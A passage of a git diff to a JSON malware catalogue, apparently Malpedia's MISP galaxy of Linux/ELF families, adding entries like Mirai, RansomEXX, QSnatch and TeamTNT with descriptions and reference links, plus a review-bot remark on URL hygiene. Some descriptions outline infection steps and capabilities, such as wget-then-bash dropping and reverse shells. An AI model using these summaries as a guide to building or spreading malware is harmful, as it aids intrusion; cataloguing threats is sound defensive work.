", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot", + "https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/", + "https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3fe8f3db-4861-4e78-8b60-a794fe22ae3f", + "value": "LiquorBot" + }, + { + "description": "Loader and Cleaner components used in attacks against high-performance computing centers in Europe.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas", + "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html", + "https://twitter.com/nunohaien/status/1261281419483140096", + "https://www.cadosecurity.com/2020/05/16/1318/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6332d57c-c46f-4907-8dac-965b15ffbed6", + "value": "Loerbas" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.log_collector", + "https://blog.netlab.360.com/dacls-the-dual-platform-rat/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0473214a-2daa-4b5b-84bc-1bcbab11ef80", + "value": "Log Collector" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lootwodniw", + "https://twitter.com/ddash_ct/status/1326887125103616000" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cfcf8608-03e7-4a5b-a46c-af342db2d540", + "value": "Lootwodniw" + }, { "description": "Masuta takes advantage of the EDB 38722 D-Link exploit.", "meta": { 
@@ -1539,6 +3164,51 @@ "uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd", "value": "Masuta" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.matryosh", + "https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4e989704-c49f-468c-95e1-1b7c5a58b3c4", + "value": "Matryosh" + }, + { + "description": "MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap", + "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a07d6748-3557-41ac-b55b-f4348dc2a3c7", + "value": "MESSAGETAP" + }, + { + "description": "A x64 ELF file infector with non-destructive payload.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim", + "https://www.guitmz.com/linux-midrashim-elf-virus/", + "https://github.com/guitmz/midrashim" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fe220358-7118-4feb-b43e-cbdaf2ea09dc", + "value": "Midrashim" + }, { "description": "", "meta": { 
@@ -1553,22 +3223,35 @@ "value": "MiKey" }, { - "description": "", + "description": "Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means \"future\" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on \"Hack Forums\" many variants of the Mirai family appeared, infecting mostly home networks all around the world.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", + "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", "http://osint.bambenekconsulting.com/feeds/", - "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet", "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", + "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/", + "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", + "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/", + "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/", "https://isc.sans.edu/diary/22786", 
"https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", - "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/", + "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/", + "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html", + "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/", + "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/", + "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet" + ], + "synonyms": [ + "Katana" ], - "synonyms": [], "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", @@ -1587,11 +3270,26 @@ "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot", + "https://blog.netlab.360.com/ddos-botnet-moobot-en/", + "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cd8deffe-eb0b-4451-8a13-11f6d291064a", + "value": "MooBot" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf", "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" 
@@ -1602,6 +3300,21 @@ "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", "value": "Moose" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi", + "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/", + "https://blog.netlab.360.com/mozi-another-botnet-using-dht/", + "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "236ba358-4c70-434c-a7ac-7a31e76c398a", + "value": "Mozi" + }, { "description": "", "meta": { 
@@ -1615,6 +3328,56 @@ "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", "value": "MrBlack" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry", + "https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ec8a41f-c72e-4832-a5a4-9d7380cea083", + "value": "Nextcry Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb", + "https://twitter.com/IntezerLabs/status/1324346324683206657", + "https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/", + "https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4ad242c-6fd0-4b1d-8d97-8f48150bf242", + "value": "Ngioweb (ELF)" + }, + { + "description": "FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. 
The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin", + "https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/", + "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/", + "https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/", + "https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html" + ], + "synonyms": [ + "remove_bds" + ], + "type": [] + }, + "uuid": "aaeb76b3-3885-4dc6-9501-4504fed9f20b", + "value": "NOTROBIN" + }, { "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.", "meta": { 
@@ -1634,14 +3397,34 @@ "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", "value": "Owari" }, + { + "description": "According to Yarix digital security, this is a malware that allows to sniff on HTTPS traffic, implemented as Apache module.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.p0st5n1f3r", + "https://www.vargroup.it/wp-content/uploads/2019/10/ReverseEngineering_SecurityReport_EN_2019.10.16-2.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cc48c6ae-d274-4ad0-b013-bd75041a20c8", + "value": "p0sT5n1F3r" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", + "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", - "https://twitter.com/juanandres_gs/status/944741575837528064", - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf" + "https://www.youtube.com/watch?v=JXsjRUxx47E", + "https://twitter.com/juanandres_gs/status/944741575837528064" ], "synonyms": [], "type": [] 
@@ -1654,7 +3437,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot", - "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf" + "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf", + "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf", + "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://twitter.com/Nocturnus/status/1308430959512092673", + "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/" ], "synonyms": [ "DDoS Perl IrcBot", 
@@ -1678,11 +3466,59 @@ "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", "value": "Persirai" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead", + "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", + "https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" + ], + "synonyms": [], + "type": [] + }, + "uuid": "de3c14aa-f9f4-4071-8e6e-a2c16a3394ad", + "value": "PLEAD (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei", + "https://twitter.com/IntezerLabs/status/1338480158249013250", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b6899bda-54e9-4953-8af5-22af39776b69", + "value": "Prometei" + }, + { + "description": "Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean", + "https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/", + "https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aa918c10-e5c7-4abd-b8c0-3c938a6675f5", + "value": "Pro-Ocean" + }, { "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. 
Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], 
@@ -1691,6 +3527,43 @@ "uuid": "92a1288f-cc4d-47ca-8399-25fe5a39cf2d", "value": "pupy (ELF)" }, + { + "description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen\u2014naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet\u2014this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/", + "https://www.anomali.com/blog/the-ech0raix-ransomware", + "https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/", + "https://www.qnap.com/en/security-advisory/QSA-20-02", + "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", + "https://www.ibm.com/downloads/cas/Z81AVOY7" + ], + "synonyms": [ + "eCh0raix" + ], + "type": [] + }, + "uuid": "a0b12e5f-0257-41f1-beda-001ad944c4ca", + "value": "QNAPCrypt" + }, + { + "description": "The malware infects QNAP NAS devices, is persisting via various mechanisms and resists cleaning by preventing firmware updates and interfering with QNAP MalwareRemover. 
The malware steals passwords and hashes", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch", + "https://bin.re/blog/the-dga-of-qsnatch/", + "https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices", + "https://us-cert.cisa.gov/ncas/alerts/aa20-209a", + "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "48389957-30e2-4747-b4c6-8b8a9f15250f", + "value": "QSnatch" + }, { "description": "", "meta": { @@ -1709,7 +3582,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", - "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" + "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/16/22" ], "synonyms": [], "type": [] 
@@ -1717,13 +3591,114 @@ "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", "value": "Rakos" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx", + "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195" + ], + "synonyms": [ + "Defray777" + ], + "type": [] + }, + "uuid": "946814a1-957c-48ce-9068-fdef24a025bf", + "value": "RansomEXX (ELF)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.raspberrypibotnet", + "https://kindredsec.com/2019/06/03/code-analysis-of-basic-cryptomining-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8dee025b-2233-4cd8-af02-fcdcd40b378f", + "value": "RaspberryPiBotnet" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rat_hodin", + "https://github.com/Thibault-69/RAT-Hodin-v2.5" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6aacf515-de49-4afc-a135-727c9beaab0b", + "value": "rat_hodin" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rbs_srv", + "https://github.com/Thibault-69/Remote_Shell" + ], + "synonyms": [], + "type": [] + 
}, + "uuid": "a08d9f8b-2cc5-48c2-8cce-ee713bcdc4b7", + "value": "rbs_srv" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.redxor", + "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "421b2ec7-d4e6-4fc8-9bd3-55fe26337aae", + "value": "RedXOR" + }, + { + "description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan\u2019s configuration data is stored in a file encrypted with XOR algorithm", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe", + "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/", + "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/", + "https://vms.drweb.com/virus/?i=7754026&lng=en" + ], + "synonyms": [], + "type": [] + }, + "uuid": "48b9a9fd-4c1a-428a-acc0-40b1a3fa7590", + "value": "Rekoobe" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile", + "https://github.com/f0rb1dd3n/Reptile" + ], + "synonyms": [], + "type": [] + }, + "uuid": "934478a1-1243-4c26-8360-be3d01ae193e", + "value": "reptile" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", - "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/", - "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/" + "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/" ], "synonyms": [], "type": [] 
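Review bot: The new RansomEXX (ELF) refs carry a CrowdStrike URL with marketing tracking parameters (`?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout`), which are not part of the resource and will be replayed by every analyst who follows the link out of MISP. The entry should use the canonical form `"https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/"`. The same entry reaches the Group-IB ransomware report through a third-party mirror (`cisoclub.ru/...?bp-attachment=...`) rather than the publisher, which is a less durable and less trustworthy source for a threat-intel reference. Since this file is regenerated from the Malpedia MISP export (per the commit message), both fixes belong in the upstream reference list or they will reappear on the next update.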
@@ -1731,6 +3706,33 @@ "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", "value": "Rex" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rhombus", + "https://old.reddit.com/r/LinuxMalware/comments/fh3zar/memo_rhombus_an_elf_bot_installerdropper/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "af886910-9a0b-478e-b53d-54c8a103acb4", + "value": "RHOMBUS" + }, + { + "description": "P2P Botnet discovered by Netlab360. The botnet infects linux servers via the Webmin RCE vulnerability (CVE-2019-15107) which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlabs360 analysis, the botnet serves mainly 7 functions: reverse shell, self-uninstall, gather process' network information, gather Bot information, execute system commands, run encrypted files specified in URLs and four DDoS attack methods: ICMP Flood, HTTP Flood, TCP Flood, and UDP Flood.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.roboto", + "https://blog.netlab.360.com/the-awaiting-roboto-botnet-en", + "https://www.zdnet.com/article/new-roboto-botnet-emerges-targeting-linux-servers-running-webmin" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e18bf514-b978-4bef-b4d9-834a5100fced", + "value": "Roboto" + }, { "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { 
@@ -1775,12 +3777,40 @@ "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", "value": "Shishiga" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.silex", + "https://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/" + ], + "synonyms": [ + "silexbot" + ], + "type": [] + }, + "uuid": "bf059cb4-f73a-4181-bf71-d8da7bf50dd8", + "value": "Silex" + }, + { + "description": "According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.slapstick", + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb3e0a1d-3a98-4cbd-ad7f-4bbb4b9a8351", + "value": "SLAPSTICK" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", - "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" + "https://cis.verint.com/2016/11/08/spamtorte-version-2/" ], "synonyms": [], "type": [] 
@@ -1801,11 +3831,40 @@ "uuid": "3ccd3143-c34d-4680-94b9-2cc4fa4f86fa", "value": "SpeakUp" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter", + "https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b9ed5797-b591-4ca9-ba77-ce86308e333a", + "value": "Specter" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.speculoos", + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "df23ae3a-e10d-4c49-b379-2ea2fd1925af", + "value": "Speculoos" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", + "https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/", "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" ], "synonyms": [], 
@@ -1819,7 +3878,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", - "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/", + "https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/", + "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/", + "https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/", + "https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/" ], "synonyms": [], "type": [] @@ -1827,6 +3891,20 @@ "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", "value": "Stantinko" }, + { + "description": "According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi", + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", + "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "21ff33b5-ef21-4263-8747-7de3d2dbdde6", + "value": "STEELCORGI" + }, { "description": "", "meta": { 
@@ -1840,6 +3918,63 @@ "uuid": "d03fa69b-53a4-4f61-b800-87e4246d2656", "value": "Sunless" }, + { + "description": "Sustes Malware doesn\u2019t infect victims by itself (it\u2019s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes", + "https://marcoramilli.com/2018/09/20/sustes-malware-cpu-for-monero/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5c117b01-826b-4656-b6ca-8b18b6e6159f", + "value": "sustes miner" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt", + "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool", + "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/", + "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "24695f84-d3af-477e-92dd-c05c9536ebf5", + "value": "TeamTNT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon", + "https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers", + "https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ed098719-797b-4cb3-a73c-65b6d08ebdfa", + "value": "TheMoon" + }, + { + "description": "", + "meta": { + "refs": [ + 
